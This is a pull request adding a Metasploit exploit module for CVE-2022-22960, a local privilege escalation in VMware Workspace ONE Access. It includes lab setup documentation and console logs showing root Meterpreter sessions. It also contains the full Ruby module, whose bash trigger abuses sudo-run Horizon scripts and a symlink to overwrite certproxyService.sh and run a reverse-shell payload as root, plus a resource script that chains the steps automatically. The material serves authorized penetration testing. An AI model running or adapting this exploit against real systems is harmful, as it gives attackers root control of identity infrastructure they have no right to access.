### PR TITLE
VMware Workspace One Access mr_me Hekate LPE

### DIFF
--- a/documentation/modules/exploit/linux/local/vmware_workspace_one_access_cve_2022_22960.md
+++ b/documentation/modules/exploit/linux/local/vmware_workspace_one_access_cve_2022_22960.md
@@ -1,0 +1,125 @@
+## Vulnerable Application
+
+This module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the certproxyService.sh script
+so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their
+privileges to root access.
+
+| Vulnerable Application  | Vulnerable version   |
+|---|---|
+| VMware Workspace ONE Access (Access)   |  21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0  |
+| VMware Identity Manager (vIDM)  |  3.3.6, 3.3.5, 3.3.4, 3.3.3  |
+| VMware vRealize Automation (vRA)  |  8.x, 7.6  |
+| VMware Cloud Foundation | 4.x | 
+| vRealize Suite Lifecycle Manager| 8.x |
+
+### Setup
+
+In order to download a vulnerable application you do need VMware Customer Connect credentials. Navigate to
+[Download VMware Workspace ONE Access (VIDM)](https://customerconnect.vmware.com/downloads/info/slug/desktop_end_user_computing/vmware_workspace_one_access_vidm/20_10).
+to download the OVA file. 
+During VM Configuration within VMware Fusion, in Addition Settings input the following: 
+
+#### Application:
+
+Timezone: (timezone of your choice)
+
+Join the VMware Custom Experience Improvement Program: (deselect)
+
+#### Networking Properties: (note the following may depend on your network configuration)
+
+Host Name (FQDN): access01.corp.local
+
+Default Gateway: 192.168.123.1 
+
+Domain Name: (blank)
+
+Domain Search Path: (blank)
+
+DNS: 192.168.123.1 
+
+IP Address: 192.168.123.16 
+Network: 255.255.255.0
+
+Add the following line to your `/etc/hosts` file:
+`192.168.123.16 access.test.local`
+
+Be sure to change the network adapter of the VM to the network adapter that corresponds to the subnet of the static IP address you assigned above.
+
+#### GUI Setup
+
+Once running navigate to https://access.test.local:8443/cfg/setup
+in order to complete the following setup requirements:
+
+Set Passwords
+ - Appliance Administrator Account
+ - Appliance Root Account
+ - Remote User Account
+
+Select Database
+ - Database Type: Internal Database
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/local/vmware_workspace_one_access_cve_2022_22960`
+1. Set the `SESSION`, `LHOST`, and `TARGET`
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### VMware Identity Manager 21.08.0.1-19010796
+
+```
+msf6 exploit(linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain) > use exploit/linux/local/vmware_workspace_one_access_cve_2022_22960
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > set lport 4443
+lport => 4443
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4443
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. vulnerable
+[*] Writing '/tmp/QbCpIao.sh' (1658 bytes) ...
+[*] Triggering the payload...
+[*] Sending stage (24772 bytes) to 192.168.123.16
+[+] Deleted /tmp/QbCpIao.sh
+[*] Meterpreter session 9 opened (192.168.123.1:4443 -> 192.168.123.16:53800) at 2023-04-07 10:38:05 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : access01.corp.local
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.123.16 - Meterpreter session 9 closed.  Reason: User exit
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > set target 1
+target => 1
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4443
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. vulnerable
+[*] Writing '/tmp/oMNw.sh' (250 bytes) ...
+[*] Writing '/tmp/FsMoUmqB.sh' (1132 bytes) ...
+[*] Triggering the payload...
+[*] Sending stage (3045348 bytes) to 192.168.123.16
+[+] Deleted /tmp/oMNw.sh
+[+] Deleted /tmp/FsMoUmqB.sh
+[*] Meterpreter session 10 opened (192.168.123.1:4443 -> 192.168.123.16:53838) at 2023-04-07 10:38:34 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : access01.corp.local
+OS           : VMware Photon OS 3.0 (Linux 4.19.217-1.ph3)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```

--- a/modules/exploits/linux/local/vmware_workspace_one_access_cve_2022_22960.rb
+++ b/modules/exploits/linux/local/vmware_workspace_one_access_cve_2022_22960.rb
@@ -1,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  TARGET_FILE = '/opt/vmware/certproxy/bin/certproxyService.sh'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => 'VMware Workspace ONE Access CVE-2022-22960',
+          'Description' => %q{
+            This module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the
+            certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with
+            the uid 1001 to escalate their privileges to root access.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'mr_me', # Discovery & PoC
+            'jheysel-r7' # Metasploit Module
+          ],
+          'Platform' => [ 'linux', 'unix' ],
+          'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+          'SessionTypes' => ['shell', 'meterpreter'],
+          'Targets' => [
+            [
+              'Unix Command',
+              {
+                'Platform' => 'unix',
+                'Arch' => ARCH_CMD,
+                'Type' => :unix_cmd,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Linux Dropper',
+              {
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X64],
+                'Type' => :linux_dropper,
+                'CmdStagerFlavor' => %i[curl wget],
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+          'Privileged' => true,
+          'DefaultTarget' => 0,
+          'References' => [
+            [ 'CVE', '2022-22960' ],
+            ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],
+            ['URL', 'https://github.com/sourceincite/hekate/'],
+            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']
+          ],
+          'DisclosureDate' => '2022-04-06',
+          'Notes' => {
+            # We're corrupting certproxyService.sh, if restoring the contents fails it won't work.
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => [ARTIFACTS_ON_DISK]
+          }
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def lpe_trigger(execute_payload)
+    cert_filename = Rex::Text.rand_text_alpha(4..12)
+    file_contents = <<~EOF
+      #!/bin/bash
+      cp #{TARGET_FILE} #{datastore['WritableDir']}/#{@certproxy_backup}
+      sudo /usr/local/horizon/scripts/publishCaCert.hzn #{TARGET_FILE} #{cert_filename}
+      mkdir #{cert_filename}
+      ln -s #{TARGET_FILE} #{cert_filename}/debugConfig.txt
+      sudo /usr/local/horizon/scripts/gatherConfig.hzn #{cert_filename}
+      rm -rf #{cert_filename}
+      chmod 755 #{TARGET_FILE}
+      echo "mv /etc/ssl/certs/#{cert_filename} #{TARGET_FILE}" > #{TARGET_FILE}
+      echo "chown root:root #{TARGET_FILE}" >> #{TARGET_FILE}
+      echo "chmod 640 #{TARGET_FILE}" >> #{TARGET_FILE}
+      echo "#{execute_payload}" >> #{TARGET_FILE}
+      echo "mv #{datastore['WritableDir']}/#{@certproxy_backup} #{TARGET_FILE} && chmod 500 #{TARGET_FILE} && chown root:root #{TARGET_FILE}" >> #{TARGET_FILE}#{' '}
+      sudo #{TARGET_FILE}
+    EOF
+    file_contents
+  end
+
+  def check
+    unless whoami == 'horizon'
+      return CheckCode::Safe('Not running as the horizon user.')
+    end
+
+    test = cmd_exec("sudo #{TARGET_FILE}")
+    unless test.include? 'basename: missing operand'
+      CheckCode::Safe
+    end
+
+    CheckCode::Appears('vulnerable')
+  end
+
+  def exploit
+    @certproxy_backup = Rex::Text.rand_text_alpha(4..12)
+    payload_filename = Rex::Text.rand_text_alpha(4..12) + '.sh'
+    trigger_filename = Rex::Text.rand_text_alpha(4..12) + '.sh'
+
+    case target['Type']
+    when :unix_cmd
+      execute_payload = payload.encoded
+    when :linux_dropper
+      payload_path = "#{datastore['WritableDir']}/#{payload_filename}"
+      upload_and_chmodx(payload_path, generate_payload_exe)
+      execute_payload = "#{datastore['WritableDir']}/#{payload_filename}"
+      register_file_for_cleanup(payload_path)
+    else
+      fail_with(Failure::BadConfig, 'Invalid target specified')
+    end
+
+    lpe_trigger_data = lpe_trigger(execute_payload)
+
+    upload_and_chmodx("#{datastore['WritableDir']}/#{trigger_filename}", lpe_trigger_data)
+    register_file_for_cleanup("#{datastore['WritableDir']}/#{trigger_filename}")
+
+    print_status('Triggering the payload...')
+    cmd_exec("cd #{datastore['WritableDir']}; ./#{trigger_filename}")
+  end
+end

--- a/modules/exploits/linux/local/vmware_workspace_one_access_cve_2022_22960.rb
+++ b/modules/exploits/linux/local/vmware_workspace_one_access_cve_2022_22960.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'builder'
+
 class MetasploitModule < Msf::Exploit::Local
   Rank = GoodRanking
 

--- a/modules/exploits/linux/local/vmware_workspace_one_access_cve_2022_22960.rb
+++ b/modules/exploits/linux/local/vmware_workspace_one_access_cve_2022_22960.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = ExcellentRanking
+  Rank = GoodRanking
 
   include Msf::Exploit::EXE
   include Msf::Post::File

--- a/modules/exploits/linux/local/vmware_workspace_one_access_cve_2022_22960.rb
+++ b/modules/exploits/linux/local/vmware_workspace_one_access_cve_2022_22960.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'builder'
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = GoodRanking
 

--- a/scripts/resource/run_cve-2022-22960_lpe.rc
+++ b/scripts/resource/run_cve-2022-22960_lpe.rc
@@ -1,0 +1,8 @@
+<ruby>
+print_status("Running vmware_workspace cve-2022-22960")
+run_single("use exploits/linux/local/vmware_workspace_one_access_cve_2022_22960")
+run_single("set session -1")
+session_lhost = framework.sessions[framework.sessions.keys.last].tunnel_local.split(':')[0]
+run_single("set lhost #{session_lhost}")
+run_single("run")
+</ruby>


### PR DESCRIPTION
This module exploits CVE-2022-22960, which allows the user to overwrite the permissions of the `certproxyService.sh` script so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their privileges to `root` access.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain`
- [ ] set `RHOSTS` `LHOST` 
- [ ] Do `run` to run the module
- [ ] Receive a meterpreter session in the context of the `horizon` user
- [ ] Do `bg` to background the session
- [ ] `use linux/local/vmware_workspace_one_access_cve_2022_22960`
- [ ] set `session` and `LHOST`
- [ ] Do `run` to run the module
- [ ] Receive a meterpreter session in the context of the `root` user